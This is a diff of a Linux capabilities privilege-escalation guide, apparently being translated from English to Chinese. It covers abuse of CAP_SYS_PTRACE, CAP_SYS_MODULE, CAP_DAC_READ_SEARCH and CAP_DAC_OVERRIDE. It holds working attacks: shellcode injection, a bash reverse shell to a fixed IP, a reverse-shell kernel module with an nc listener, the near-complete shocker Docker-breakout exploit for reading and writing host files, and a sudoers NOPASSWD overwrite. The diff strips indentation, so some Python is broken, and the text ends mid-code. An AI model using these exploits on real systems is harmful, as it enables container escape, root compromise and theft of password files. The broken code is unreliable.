-**[`CAP_SYS_PTRACE`](https://man7.org/linux/man-pages/man7/capabilities.7.html)** grants the ability to use debugging and system call tracing functionalities provided by `ptrace(2)` and cross-memory attach calls like `process_vm_readv(2)` and `process_vm_writev(2)`. Although powerful for diagnostic and monitoring purposes, if `CAP_SYS_PTRACE` is enabled without restrictive measures like a seccomp filter on `ptrace(2)`, it can significantly undermine system security. Specifically, it can be exploited to circumvent other security restrictions, notably those imposed by seccomp, as demonstrated by [proofs of concept (PoC) like this one](https://gist.github.com/thejh/8346f47e359adecd1d53). - -**Example with binary (python)** +**[`CAP_SYS_PTRACE`](https://man7.org/linux/man-pages/man7/capabilities.7.html)** 授予使用 `ptrace(2)` 提供的调试和系统调用跟踪功能的能力,以及像 `process_vm_readv(2)` 和 `process_vm_writev(2)` 这样的跨内存附加调用。尽管对于诊断和监控目的非常强大,但如果在没有像 `ptrace(2)` 的 seccomp 过滤器等限制措施的情况下启用 `CAP_SYS_PTRACE`,可能会显著削弱系统安全性。具体来说,它可以被利用来规避其他安全限制,特别是 seccomp 强加的限制,正如 [这样的概念证明 (PoC)](https://gist.github.com/thejh/8346f47e359adecd1d53) 所示。 +**使用二进制文件的示例 (python)** ```bash getcap -r / 2>/dev/null /usr/bin/python2.7 = cap_sys_ptrace+ep @@ -524,35 +457,35 @@ PTRACE_DETACH = 17 # Structure defined in # https://code.woboq.org/qt5/include/sys/user.h.html#user_regs_struct class user_regs_struct(ctypes.Structure): - _fields_ = [ - ("r15", ctypes.c_ulonglong), - ("r14", ctypes.c_ulonglong), - ("r13", ctypes.c_ulonglong), - ("r12", ctypes.c_ulonglong), - ("rbp", ctypes.c_ulonglong), - ("rbx", ctypes.c_ulonglong), - ("r11", ctypes.c_ulonglong), - ("r10", ctypes.c_ulonglong), - ("r9", ctypes.c_ulonglong), - ("r8", ctypes.c_ulonglong), - ("rax", ctypes.c_ulonglong), - ("rcx", ctypes.c_ulonglong), - ("rdx", ctypes.c_ulonglong), - ("rsi", ctypes.c_ulonglong), - ("rdi", ctypes.c_ulonglong), - ("orig_rax", ctypes.c_ulonglong), - ("rip", ctypes.c_ulonglong), - ("cs", ctypes.c_ulonglong), - ("eflags", ctypes.c_ulonglong), - ("rsp", ctypes.c_ulonglong), - ("ss", ctypes.c_ulonglong), - ("fs_base", ctypes.c_ulonglong), - ("gs_base", ctypes.c_ulonglong), - ("ds", ctypes.c_ulonglong), - ("es", ctypes.c_ulonglong), - ("fs", ctypes.c_ulonglong), - ("gs", ctypes.c_ulonglong), - ] +_fields_ = [ +("r15", ctypes.c_ulonglong), +("r14", ctypes.c_ulonglong), +("r13", ctypes.c_ulonglong), +("r12", ctypes.c_ulonglong), +("rbp", ctypes.c_ulonglong), +("rbx", ctypes.c_ulonglong), +("r11", ctypes.c_ulonglong), +("r10", ctypes.c_ulonglong), +("r9", ctypes.c_ulonglong), +("r8", ctypes.c_ulonglong), +("rax", ctypes.c_ulonglong), +("rcx", ctypes.c_ulonglong), +("rdx", ctypes.c_ulonglong), +("rsi", ctypes.c_ulonglong), +("rdi", ctypes.c_ulonglong), +("orig_rax", ctypes.c_ulonglong), +("rip", ctypes.c_ulonglong), +("cs", ctypes.c_ulonglong), +("eflags", ctypes.c_ulonglong), +("rsp", ctypes.c_ulonglong), +("ss", ctypes.c_ulonglong), +("fs_base", ctypes.c_ulonglong), +("gs_base", ctypes.c_ulonglong), +("ds", ctypes.c_ulonglong), +("es", ctypes.c_ulonglong), +("fs", ctypes.c_ulonglong), +("gs", ctypes.c_ulonglong), +] libc = ctypes.CDLL("libc.so.6") @@ -576,13 +509,13 @@ shellcode = "\x48\x31\xc0\x48\x31\xd2\x48\x31\xf6\xff\xc6\x6a\x29\x58\x6a\x02\x5 # Inject the shellcode into the running process byte by byte. for i in xrange(0,len(shellcode),4): - # Convert the byte to little endian. - shellcode_byte_int=int(shellcode[i:4+i].encode('hex'),16) - shellcode_byte_little_endian=struct.pack("& /dev/tcp/192.168.115.135/5656 0>&1'") ``` - -You won’t be able to see the output of the command executed but it will be executed by that process (so get a rev shell). +您将无法看到执行命令的输出,但它将由该进程执行(因此获取反向 shell)。 > [!WARNING] -> If you get the error "No symbol "system" in current context." check the previous example loading a shellcode in a program via gdb. +> 如果您收到错误 "No symbol "system" in current context.",请检查通过 gdb 在程序中加载 shellcode 的前一个示例。 -**Example with environment (Docker breakout) - Shellcode Injection** - -You can check the enabled capabilities inside the docker container using: +**带环境的示例(Docker 突破) - Shellcode 注入** +您可以使用以下命令检查 docker 容器内启用的能力: ```bash capsh --print Current: = cap_chown,cap_dac_override,cap_fowner,cap_fsetid,cap_kill,cap_setgid,cap_setuid,cap_setpcap,cap_net_bind_service,cap_net_raw,cap_sys_chroot,cap_sys_ptrace,cap_mknod,cap_audit_write,cap_setfcap+ep Bounding set =cap_chown,cap_dac_override,cap_fowner,cap_fsetid,cap_kill,cap_setgid,cap_setuid,cap_setpcap,cap_net_bind_service,cap_net_raw,cap_sys_chroot,cap_sys_ptrace,cap_mknod,cap_audit_write,cap_setfcap Securebits: 00/0x0/1'b0 - secure-noroot: no (unlocked) - secure-no-suid-fixup: no (unlocked) - secure-keep-caps: no (unlocked) +secure-noroot: no (unlocked) +secure-no-suid-fixup: no (unlocked) +secure-keep-caps: no (unlocked) uid=0(root) gid=0(root) groups=0(root ``` +列出 **主机** 中运行的 **进程** `ps -eaf` -List **processes** running in the **host** `ps -eaf` - -1. Get the **architecture** `uname -m` -2. Find a **shellcode** for the architecture ([https://www.exploit-db.com/exploits/41128](https://www.exploit-db.com/exploits/41128)) -3. Find a **program** to **inject** the **shellcode** into a process memory ([https://github.com/0x00pf/0x00sec_code/blob/master/mem_inject/infect.c](https://github.com/0x00pf/0x00sec_code/blob/master/mem_inject/infect.c)) -4. **Modify** the **shellcode** inside the program and **compile** it `gcc inject.c -o inject` -5. **Inject** it and grab your **shell**: `./inject 299; nc 172.17.0.1 5600` +1. 获取 **架构** `uname -m` +2. 查找适合该架构的 **shellcode** ([https://www.exploit-db.com/exploits/41128](https://www.exploit-db.com/exploits/41128)) +3. 查找一个 **程序** 来 **注入** **shellcode** 到进程内存中 ([https://github.com/0x00pf/0x00sec_code/blob/master/mem_inject/infect.c](https://github.com/0x00pf/0x00sec_code/blob/master/mem_inject/infect.c)) +4. **修改** 程序中的 **shellcode** 并 **编译** 它 `gcc inject.c -o inject` +5. **注入** 并获取你的 **shell**: `./inject 299; nc 172.17.0.1 5600` ## CAP_SYS_MODULE -**[`CAP_SYS_MODULE`](https://man7.org/linux/man-pages/man7/capabilities.7.html)** empowers a process to **load and unload kernel modules (`init_module(2)`, `finit_module(2)` and `delete_module(2)` system calls)**, offering direct access to the kernel's core operations. This capability presents critical security risks, as it enables privilege escalation and total system compromise by allowing modifications to the kernel, thereby bypassing all Linux security mechanisms, including Linux Security Modules and container isolation. -**This means that you can** **insert/remove kernel modules in/from the kernel of the host machine.** +**[`CAP_SYS_MODULE`](https://man7.org/linux/man-pages/man7/capabilities.7.html)** 使进程能够 **加载和卸载内核模块 (`init_module(2)`、`finit_module(2)` 和 `delete_module(2)` 系统调用)**,提供对内核核心操作的直接访问。此能力带来了严重的安全风险,因为它允许特权升级和完全系统妥协,通过允许对内核的修改,从而绕过所有 Linux 安全机制,包括 Linux 安全模块和容器隔离。 +**这意味着你可以** **在主机的内核中插入/移除内核模块。** -**Example with binary** - -In the following example the binary **`python`** has this capability. +**带二进制文件的示例** +在以下示例中,二进制文件 **`python`** 拥有此能力。 ```bash getcap -r / 2>/dev/null /usr/bin/python2.7 = cap_sys_module+ep ``` - -By default, **`modprobe`** command checks for dependency list and map files in the directory **`/lib/modules/$(uname -r)`**.\ -In order to abuse this, lets create a fake **lib/modules** folder: - +默认情况下,**`modprobe`** 命令会检查目录 **`/lib/modules/$(uname -r)`** 中的依赖列表和映射文件。\ +为了利用这一点,让我们创建一个假的 **lib/modules** 文件夹: ```bash mkdir lib/modules -p cp -a /lib/modules/5.0.0-20-generic/ lib/modules/$(uname -r) ``` - -Then **compile the kernel module you can find 2 examples below and copy** it to this folder: - +然后**编译内核模块,您可以在下面找到 2 个示例并将其复制**到此文件夹: ```bash cp reverse-shell.ko lib/modules/$(uname -r)/ ``` - -Finally, execute the needed python code to load this kernel module: - +最后,执行所需的python代码以加载此内核模块: ```python import kmod km = kmod.Kmod() km.set_mod_dir("/path/to/fake/lib/modules/5.0.0-20-generic/") km.modprobe("reverse-shell") ``` +**示例 2:带二进制文件** -**Example 2 with binary** - -In the following example the binary **`kmod`** has this capability. - +在以下示例中,二进制文件 **`kmod`** 具有此能力。 ```bash getcap -r / 2>/dev/null /bin/kmod = cap_sys_module+ep ``` +这意味着可以使用命令 **`insmod`** 插入内核模块。按照下面的示例获取一个 **reverse shell**,利用这个特权。 -Which means that it's possible to use the command **`insmod`** to insert a kernel module. Follow the example below to get a **reverse shell** abusing this privilege. - -**Example with environment (Docker breakout)** - -You can check the enabled capabilities inside the docker container using: +**带环境的示例(Docker 突破)** +您可以使用以下命令检查 Docker 容器内启用的能力: ```bash capsh --print Current: = cap_chown,cap_dac_override,cap_fowner,cap_fsetid,cap_kill,cap_setgid,cap_setuid,cap_setpcap,cap_net_bind_service,cap_net_raw,cap_sys_module,cap_sys_chroot,cap_mknod,cap_audit_write,cap_setfcap+ep Bounding set =cap_chown,cap_dac_override,cap_fowner,cap_fsetid,cap_kill,cap_setgid,cap_setuid,cap_setpcap,cap_net_bind_service,cap_net_raw,cap_sys_module,cap_sys_chroot,cap_mknod,cap_audit_write,cap_setfcap Securebits: 00/0x0/1'b0 - secure-noroot: no (unlocked) - secure-no-suid-fixup: no (unlocked) - secure-keep-caps: no (unlocked) +secure-noroot: no (unlocked) +secure-no-suid-fixup: no (unlocked) +secure-keep-caps: no (unlocked) uid=0(root) gid=0(root) groups=0(root) ``` +在之前的输出中,您可以看到 **SYS_MODULE** 权限已启用。 -Inside the previous output you can see that the **SYS_MODULE** capability is enabled. - -**Create** the **kernel module** that is going to execute a reverse shell and the **Makefile** to **compile** it: - +**创建** 将要执行反向 shell 的 **内核模块** 和 **Makefile** 以 **编译** 它: ```c:reverse-shell.c #include #include @@ -779,11 +688,11 @@ static char* envp[] = {"PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/ // call_usermodehelper function is used to create user mode processes from kernel space static int __init reverse_shell_init(void) { - return call_usermodehelper(argv[0], argv, envp, UMH_WAIT_EXEC); +return call_usermodehelper(argv[0], argv, envp, UMH_WAIT_EXEC); } static void __exit reverse_shell_exit(void) { - printk(KERN_INFO "Exiting\n"); +printk(KERN_INFO "Exiting\n"); } module_init(reverse_shell_init); @@ -794,26 +703,22 @@ module_exit(reverse_shell_exit); obj-m +=reverse-shell.o all: - make -C /lib/modules/$(shell uname -r)/build M=$(PWD) modules +make -C /lib/modules/$(shell uname -r)/build M=$(PWD) modules clean: - make -C /lib/modules/$(shell uname -r)/build M=$(PWD) clean +make -C /lib/modules/$(shell uname -r)/build M=$(PWD) clean ``` - > [!WARNING] -> The blank char before each make word in the Makefile **must be a tab, not spaces**! - -Execute `make` to compile it. +> Makefile 中每个 make 单词前的空白字符 **必须是制表符,而不是空格**! +执行 `make` 进行编译。 ``` ake[1]: *** /lib/modules/5.10.0-kali7-amd64/build: No such file or directory. Stop. sudo apt update sudo apt full-upgrade ``` - -Finally, start `nc` inside a shell and **load the module** from another one and you will capture the shell in the nc process: - +最后,在一个 shell 中启动 `nc`,并从另一个 shell 中 **加载模块**,你将会在 nc 进程中捕获到 shell: ```bash #Shell 1 nc -lvnp 4444 @@ -821,67 +726,57 @@ nc -lvnp 4444 #Shell 2 insmod reverse-shell.ko #Launch the reverse shell ``` +**该技术的代码来自于“滥用 SYS_MODULE 能力”的实验室** [**https://www.pentesteracademy.com/**](https://www.pentesteracademy.com) -**The code of this technique was copied from the laboratory of "Abusing SYS_MODULE Capability" from** [**https://www.pentesteracademy.com/**](https://www.pentesteracademy.com) - -Another example of this technique can be found in [https://www.cyberark.com/resources/threat-research-blog/how-i-hacked-play-with-docker-and-remotely-ran-code-on-the-host](https://www.cyberark.com/resources/threat-research-blog/how-i-hacked-play-with-docker-and-remotely-ran-code-on-the-host) +该技术的另一个示例可以在 [https://www.cyberark.com/resources/threat-research-blog/how-i-hacked-play-with-docker-and-remotely-ran-code-on-the-host](https://www.cyberark.com/resources/threat-research-blog/how-i-hacked-play-with-docker-and-remotely-ran-code-on-the-host) 中找到。 ## CAP_DAC_READ_SEARCH -[**CAP_DAC_READ_SEARCH**](https://man7.org/linux/man-pages/man7/capabilities.7.html) enables a process to **bypass permissions for reading files and for reading and executing directories**. Its primary use is for file searching or reading purposes. However, it also allows a process to use the `open_by_handle_at(2)` function, which can access any file, including those outside the process's mount namespace. The handle used in `open_by_handle_at(2)` is supposed to be a non-transparent identifier obtained through `name_to_handle_at(2)`, but it can include sensitive information like inode numbers that are vulnerable to tampering. The potential for exploitation of this capability, particularly in the context of Docker containers, was demonstrated by Sebastian Krahmer with the shocker exploit, as analyzed [here](https://medium.com/@fun_cuddles/docker-breakout-exploit-analysis-a274fff0e6b3). -**This means that you can** **bypass can bypass file read permission checks and directory read/execute permission checks.** +[**CAP_DAC_READ_SEARCH**](https://man7.org/linux/man-pages/man7/capabilities.7.html) 使进程能够 **绕过读取文件和读取及执行目录的权限**。它的主要用途是用于文件搜索或读取。然而,它还允许进程使用 `open_by_handle_at(2)` 函数,该函数可以访问任何文件,包括那些在进程的挂载命名空间之外的文件。在 `open_by_handle_at(2)` 中使用的句柄应该是通过 `name_to_handle_at(2)` 获得的非透明标识符,但它可以包含易受篡改的敏感信息,如 inode 号。该能力的潜在利用,特别是在 Docker 容器的上下文中,已由 Sebastian Krahmer 通过 shocker 漏洞进行了演示,分析见 [这里](https://medium.com/@fun_cuddles/docker-breakout-exploit-analysis-a274fff0e6b3)。 +**这意味着您可以** **绕过文件读取权限检查和目录读取/执行权限检查。** -**Example with binary** - -The binary will be able to read any file. So, if a file like tar has this capability it will be able to read the shadow file: +**带有二进制文件的示例** +该二进制文件将能够读取任何文件。因此,如果像 tar 这样的文件具有此能力,它将能够读取 shadow 文件: ```bash cd /etc tar -czf /tmp/shadow.tar.gz shadow #Compress show file in /tmp cd /tmp tar -cxf shadow.tar.gz ``` +**使用 binary2 的示例** -**Example with binary2** - -In this case lets suppose that **`python`** binary has this capability. In order to list root files you could do: - +在这种情况下,假设 **`python`** 二进制文件具有此能力。为了列出根文件,您可以执行: ```python import os for r, d, f in os.walk('/root'): - for filename in f: - print(filename) +for filename in f: +print(filename) ``` - -And in order to read a file you could do: - +为了读取文件,你可以这样做: ```python print(open("/etc/shadow", "r").read()) ``` +**示例环境(Docker 逃逸)** -**Example in Environment (Docker breakout)** - -You can check the enabled capabilities inside the docker container using: - +您可以使用以下命令检查 Docker 容器内启用的能力: ``` capsh --print Current: = cap_chown,cap_dac_override,cap_dac_read_search,cap_fowner,cap_fsetid,cap_kill,cap_setgid,cap_setuid,cap_setpcap,cap_net_bind_service,cap_net_raw,cap_sys_chroot,cap_mknod,cap_audit_write,cap_setfcap+ep Bounding set =cap_chown,cap_dac_override,cap_dac_read_search,cap_fowner,cap_fsetid,cap_kill,cap_setgid,cap_setuid,cap_setpcap,cap_net_bind_service,cap_net_raw,cap_sys_chroot,cap_mknod,cap_audit_write,cap_setfcap Securebits: 00/0x0/1'b0 - secure-noroot: no (unlocked) - secure-no-suid-fixup: no (unlocked) - secure-keep-caps: no (unlocked) +secure-noroot: no (unlocked) +secure-no-suid-fixup: no (unlocked) +secure-keep-caps: no (unlocked) uid=0(root) gid=0(root) groups=0(root) ``` +在之前的输出中,您可以看到 **DAC_READ_SEARCH** 能力已启用。因此,容器可以 **调试进程**。 -Inside the previous output you can see that the **DAC_READ_SEARCH** capability is enabled. As a result, the container can **debug processes**. - -You can learn how the following exploiting works in [https://medium.com/@fun_cuddles/docker-breakout-exploit-analysis-a274fff0e6b3](https://medium.com/@fun_cuddles/docker-breakout-exploit-analysis-a274fff0e6b3) but in resume **CAP_DAC_READ_SEARCH** not only allows us to traverse the file system without permission checks, but also explicitly removes any checks to _**open_by_handle_at(2)**_ and **could allow our process to sensitive files opened by other processes**. - -The original exploit that abuse this permissions to read files from the host can be found here: [http://stealth.openwall.net/xSports/shocker.c](http://stealth.openwall.net/xSports/shocker.c), the following is a **modified version that allows you to indicate the file you want to read as first argument and dump it in a file.** +您可以在 [https://medium.com/@fun_cuddles/docker-breakout-exploit-analysis-a274fff0e6b3](https://medium.com/@fun_cuddles/docker-breakout-exploit-analysis-a274fff0e6b3) 学习以下利用的工作原理,但简而言之,**CAP_DAC_READ_SEARCH** 不仅允许我们在没有权限检查的情况下遍历文件系统,还明确移除了对 _**open_by_handle_at(2)**_ 的任何检查,并且 **可能允许我们的进程访问其他进程打开的敏感文件**。 +滥用此权限从主机读取文件的原始利用可以在这里找到:[http://stealth.openwall.net/xSports/shocker.c](http://stealth.openwall.net/xSports/shocker.c),以下是一个 **修改版本,允许您将要读取的文件作为第一个参数指示,并将其转储到文件中。** ```c #include #include @@ -898,202 +793,186 @@ The original exploit that abuse this permissions to read files from the host can // ./socker /etc/shadow shadow #Read /etc/shadow from host and save result in shadow file in current dir struct my_file_handle { - unsigned int handle_bytes; - int handle_type; - unsigned char f_handle[8]; +unsigned int handle_bytes; +int handle_type; +unsigned char f_handle[8]; }; void die(const char *msg) { - perror(msg); - exit(errno); +perror(msg); +exit(errno); } void dump_handle(const struct my_file_handle *h) { - fprintf(stderr,"[*] #=%d, %d, char nh[] = {", h->handle_bytes, - h->handle_type); - for (int i = 0; i < h->handle_bytes; ++i) { - fprintf(stderr,"0x%02x", h->f_handle[i]); - if ((i + 1) % 20 == 0) - fprintf(stderr,"\n"); - if (i < h->handle_bytes - 1) - fprintf(stderr,", "); - } - fprintf(stderr,"};\n"); +fprintf(stderr,"[*] #=%d, %d, char nh[] = {", h->handle_bytes, +h->handle_type); +for (int i = 0; i < h->handle_bytes; ++i) { +fprintf(stderr,"0x%02x", h->f_handle[i]); +if ((i + 1) % 20 == 0) +fprintf(stderr,"\n"); +if (i < h->handle_bytes - 1) +fprintf(stderr,", "); +} +fprintf(stderr,"};\n"); } int find_handle(int bfd, const char *path, const struct my_file_handle *ih, struct my_file_handle *oh) { - int fd; - uint32_t ino = 0; - struct my_file_handle outh = { - .handle_bytes = 8, - .handle_type = 1 - }; - DIR *dir = NULL; - struct dirent *de = NULL; - path = strchr(path, '/'); - // recursion stops if path has been resolved - if (!path) { - memcpy(oh->f_handle, ih->f_handle, sizeof(oh->f_handle)); - oh->handle_type = 1; - oh->handle_bytes = 8; - return 1; - } +int fd; +uint32_t ino = 0; +struct my_file_handle outh = { +.handle_bytes = 8, +.handle_type = 1 +}; +DIR *dir = NULL; +struct dirent *de = NULL; +path = strchr(path, '/'); +// recursion stops if path has been resolved +if (!path) { +memcpy(oh->f_handle, ih->f_handle, sizeof(oh->f_handle)); +oh->handle_type = 1; +oh->handle_bytes = 8; +return 1; +} - ++path; - fprintf(stderr, "[*] Resolving '%s'\n", path); - if ((fd = open_by_handle_at(bfd, (struct file_handle *)ih, O_RDONLY)) < 0) - die("[-] open_by_handle_at"); - if ((dir = fdopendir(fd)) == NULL) - die("[-] fdopendir"); - for (;;) { - de = readdir(dir); - if (!de) - break; - fprintf(stderr, "[*] Found %s\n", de->d_name); - if (strncmp(de->d_name, path, strlen(de->d_name)) == 0) { - fprintf(stderr, "[+] Match: %s ino=%d\n", de->d_name, (int)de->d_ino); - ino = de->d_ino; - break; - } - } +++path; +fprintf(stderr, "[*] Resolving '%s'\n", path); +if ((fd = open_by_handle_at(bfd, (struct file_handle *)ih, O_RDONLY)) < 0) +die("[-] open_by_handle_at"); +if ((dir = fdopendir(fd)) == NULL) +die("[-] fdopendir"); +for (;;) { +de = readdir(dir); +if (!de) +break; +fprintf(stderr, "[*] Found %s\n", de->d_name); +if (strncmp(de->d_name, path, strlen(de->d_name)) == 0) { +fprintf(stderr, "[+] Match: %s ino=%d\n", de->d_name, (int)de->d_ino); +ino = de->d_ino; +break; +} +} - fprintf(stderr, "[*] Brute forcing remaining 32bit. This can take a while...\n"); - if (de) { - for (uint32_t i = 0; i < 0xffffffff; ++i) { - outh.handle_bytes = 8; - outh.handle_type = 1; - memcpy(outh.f_handle, &ino, sizeof(ino)); - memcpy(outh.f_handle + 4, &i, sizeof(i)); - if ((i % (1<<20)) == 0) - fprintf(stderr, "[*] (%s) Trying: 0x%08x\n", de->d_name, i); - if (open_by_handle_at(bfd, (struct file_handle *)&outh, 0) > 0) { - closedir(dir); - close(fd); - dump_handle(&outh); - return find_handle(bfd, path, &outh, oh); - } - } - } - closedir(dir); - close(fd); - return 0; +fprintf(stderr, "[*] Brute forcing remaining 32bit. This can take a while...\n"); +if (de) { +for (uint32_t i = 0; i < 0xffffffff; ++i) { +outh.handle_bytes = 8; +outh.handle_type = 1; +memcpy(outh.f_handle, &ino, sizeof(ino)); +memcpy(outh.f_handle + 4, &i, sizeof(i)); +if ((i % (1<<20)) == 0) +fprintf(stderr, "[*] (%s) Trying: 0x%08x\n", de->d_name, i); +if (open_by_handle_at(bfd, (struct file_handle *)&outh, 0) > 0) { +closedir(dir); +close(fd); +dump_handle(&outh); +return find_handle(bfd, path, &outh, oh); +} +} +} +closedir(dir); +close(fd); +return 0; } int main(int argc,char* argv[] ) { - char buf[0x1000]; - int fd1, fd2; - struct my_file_handle h; - struct my_file_handle root_h = { - .handle_bytes = 8, - .handle_type = 1, - .f_handle = {0x02, 0, 0, 0, 0, 0, 0, 0} - }; +char buf[0x1000]; +int fd1, fd2; +struct my_file_handle h; +struct my_file_handle root_h = { +.handle_bytes = 8, +.handle_type = 1, +.f_handle = {0x02, 0, 0, 0, 0, 0, 0, 0} +}; - fprintf(stderr, "[***] docker VMM-container breakout Po(C) 2014 [***]\n" - "[***] The tea from the 90's kicks your sekurity again. [***]\n" - "[***] If you have pending sec consulting, I'll happily [***]\n" - "[***] forward to my friends who drink secury-tea too! [***]\n\n\n"); +fprintf(stderr, "[***] docker VMM-container breakout Po(C) 2014 [***]\n" +"[***] The tea from the 90's kicks your sekurity again. [***]\n" +"[***] If you have pending sec consulting, I'll happily [***]\n" +"[***] forward to my friends who drink secury-tea too! [***]\n\n\n"); - read(0, buf, 1); +read(0, buf, 1); - // get a FS reference from something mounted in from outside - if ((fd1 = open("/etc/hostname", O_RDONLY)) < 0) - die("[-] open"); +// get a FS reference from something mounted in from outside +if ((fd1 = open("/etc/hostname", O_RDONLY)) < 0) +die("[-] open"); - if (find_handle(fd1, argv[1], &root_h, &h) <= 0) - die("[-] Cannot find valid handle!"); +if (find_handle(fd1, argv[1], &root_h, &h) <= 0) +die("[-] Cannot find valid handle!"); - fprintf(stderr, "[!] Got a final handle!\n"); - dump_handle(&h); +fprintf(stderr, "[!] Got a final handle!\n"); +dump_handle(&h); - if ((fd2 = open_by_handle_at(fd1, (struct file_handle *)&h, O_RDONLY)) < 0) - die("[-] open_by_handle"); +if ((fd2 = open_by_handle_at(fd1, (struct file_handle *)&h, O_RDONLY)) < 0) +die("[-] open_by_handle"); - memset(buf, 0, sizeof(buf)); - if (read(fd2, buf, sizeof(buf) - 1) < 0) - die("[-] read"); +memset(buf, 0, sizeof(buf)); +if (read(fd2, buf, sizeof(buf) - 1) < 0) +die("[-] read"); - printf("Success!!\n"); +printf("Success!!\n"); - FILE *fptr; - fptr = fopen(argv[2], "w"); - fprintf(fptr,"%s", buf); - fclose(fptr); +FILE *fptr; +fptr = fopen(argv[2], "w"); +fprintf(fptr,"%s", buf); +fclose(fptr); - close(fd2); close(fd1); +close(fd2); close(fd1); - return 0; +return 0; } ``` - > [!WARNING] -> The exploit needs to find a pointer to something mounted on the host. The original exploit used the file /.dockerinit and this modified version uses /etc/hostname. If the exploit isn't working maybe you need to set a different file. To find a file that is mounted in the host just execute mount command: +> 利用程序需要找到指向主机上某个挂载内容的指针。原始利用程序使用文件 /.dockerinit,而这个修改版本使用 /etc/hostname。如果利用程序无法工作,您可能需要设置不同的文件。要找到在主机上挂载的文件,只需执行 mount 命令: ![](<../../images/image (407) (1).png>) -**The code of this technique was copied from the laboratory of "Abusing DAC_READ_SEARCH Capability" from** [**https://www.pentesteracademy.com/**](https://www.pentesteracademy.com) - -​ - -
- -​​​​​​​​​​​[**RootedCON**](https://www.rootedcon.com/) is the most relevant cybersecurity event in **Spain** and one of the most important in **Europe**. With **the mission of promoting technical knowledge**, this congress is a boiling meeting point for technology and cybersecurity professionals in every discipline. - -{% embed url="https://www.rootedcon.com/" %} +**该技术的代码来自于“滥用 DAC_READ_SEARCH 能力”的实验室** [**https://www.pentesteracademy.com/**](https://www.pentesteracademy.com) ## CAP_DAC_OVERRIDE -**This mean that you can bypass write permission checks on any file, so you can write any file.** +**这意味着您可以绕过对任何文件的写入权限检查,因此您可以写入任何文件。** -There are a lot of files you can **overwrite to escalate privileges,** [**you can get ideas from here**](payloads-to-execute.md#overwriting-a-file-to-escalate-privileges). +有很多文件您可以 **覆盖以提升权限,** [**您可以从这里获取想法**](payloads-to-execute.md#overwriting-a-file-to-escalate-privileges)。 -**Example with binary** - -In this example vim has this capability, so you can modify any file like _passwd_, _sudoers_ or _shadow_: +**使用二进制文件的示例** +在这个示例中,vim 具有此能力,因此您可以修改任何文件,如 _passwd_、_sudoers_ 或 _shadow_: ```bash getcap -r / 2>/dev/null /usr/bin/vim = cap_dac_override+ep vim /etc/sudoers #To overwrite it ``` +**示例与二进制 2** -**Example with binary 2** - -In this example **`python`** binary will have this capability. You could use python to override any file: - +在此示例中,**`python`** 二进制文件将具有此能力。您可以使用 python 来覆盖任何文件: ```python file=open("/etc/sudoers","a") file.write("yourusername ALL=(ALL) NOPASSWD:ALL") file.close() ``` +**示例:环境 + CAP_DAC_READ_SEARCH(Docker 逃逸)** -**Example with environment + CAP_DAC_READ_SEARCH (Docker breakout)** - -You can check the enabled capabilities inside the docker container using: - +您可以使用以下命令检查 Docker 容器内启用的能力: ```bash capsh --print Current: = cap_chown,cap_dac_override,cap_dac_read_search,cap_fowner,cap_fsetid,cap_kill,cap_setgid,cap_setuid,cap_setpcap,cap_net_bind_service,cap_net_raw,cap_sys_chroot,cap_mknod,cap_audit_write,cap_setfcap+ep Bounding set =cap_chown,cap_dac_override,cap_dac_read_search,cap_fowner,cap_fsetid,cap_kill,cap_setgid,cap_setuid,cap_setpcap,cap_net_bind_service,cap_net_raw,cap_sys_chroot,cap_mknod,cap_audit_write,cap_setfcap Securebits: 00/0x0/1'b0 - secure-noroot: no (unlocked) - secure-no-suid-fixup: no (unlocked) - secure-keep-caps: no (unlocked) +secure-noroot: no (unlocked) +secure-no-suid-fixup: no (unlocked) +secure-keep-caps: no (unlocked) uid=0(root) gid=0(root) groups=0(root) ``` - -First of all read the previous section that [**abuses DAC_READ_SEARCH capability to read arbitrary files**](linux-capabilities.md#cap_dac_read_search) of the host and **compile** the exploit.\ -Then, **compile the following version of the shocker exploit** that will allow you to **write arbitrary files** inside the hosts filesystem: - +首先阅读上一节 [**滥用 DAC_READ_SEARCH 能力以读取任意文件**](linux-capabilities.md#cap_dac_read_search) 的内容,并 **编译** 漏洞利用代码。\ +然后,**编译以下版本的 shocker 漏洞利用代码**,这将允许您在主机文件系统中 **写入任意文件**: ```c #include #include @@ -1110,179 +989,169 @@ Then, **compile the following version of the shocker exploit** that will allow y // ./shocker_write /etc/passwd passwd struct my_file_handle { - unsigned int handle_bytes; - int handle_type; - unsigned char f_handle[8]; +unsigned int handle_bytes; +int handle_type; +unsigned char f_handle[8]; }; void die(const char * msg) { - perror(msg); - exit(errno); +perror(msg); +exit(errno); } void dump_handle(const struct my_file_handle * h) { - fprintf(stderr, "[*] #=%d, %d, char nh[] = {", h -> handle_bytes, - h -> handle_type); - for (int i = 0; i < h -> handle_bytes; ++i) { - fprintf(stderr, "0x%02x", h -> f_handle[i]); - if ((i + 1) % 20 == 0) - fprintf(stderr, "\n"); - if (i < h -> handle_bytes - 1) - fprintf(stderr, ", "); - } - fprintf(stderr, "};\n"); +fprintf(stderr, "[*] #=%d, %d, char nh[] = {", h -> handle_bytes, +h -> handle_type); +for (int i = 0; i < h -> handle_bytes; ++i) { +fprintf(stderr, "0x%02x", h -> f_handle[i]); +if ((i + 1) % 20 == 0) +fprintf(stderr, "\n"); +if (i < h -> handle_bytes - 1) +fprintf(stderr, ", "); +} +fprintf(stderr, "};\n"); } int find_handle(int bfd, const char *path, const struct my_file_handle *ih, struct my_file_handle *oh) { - int fd; - uint32_t ino = 0; - struct my_file_handle outh = { - .handle_bytes = 8, - .handle_type = 1 - }; - DIR * dir = NULL; - struct dirent * de = NULL; - path = strchr(path, '/'); - // recursion stops if path has been resolved - if (!path) { - memcpy(oh -> f_handle, ih -> f_handle, sizeof(oh -> f_handle)); - oh -> handle_type = 1; - oh -> handle_bytes = 8; - return 1; - } - ++path; - fprintf(stderr, "[*] Resolving '%s'\n", path); - if ((fd = open_by_handle_at(bfd, (struct file_handle * ) ih, O_RDONLY)) < 0) - die("[-] open_by_handle_at"); - if ((dir = fdopendir(fd)) == NULL) - die("[-] fdopendir"); - for (;;) { - de = readdir(dir); - if (!de) - break; - fprintf(stderr, "[*] Found %s\n", de -> d_name); - if (strncmp(de -> d_name, path, strlen(de -> d_name)) == 0) { - fprintf(stderr, "[+] Match: %s ino=%d\n", de -> d_name, (int) de -> d_ino); - ino = de -> d_ino; - break; - } - } - fprintf(stderr, "[*] Brute forcing remaining 32bit. This can take a while...\n"); - if (de) { - for (uint32_t i = 0; i < 0xffffffff; ++i) { - outh.handle_bytes = 8; - outh.handle_type = 1; - memcpy(outh.f_handle, & 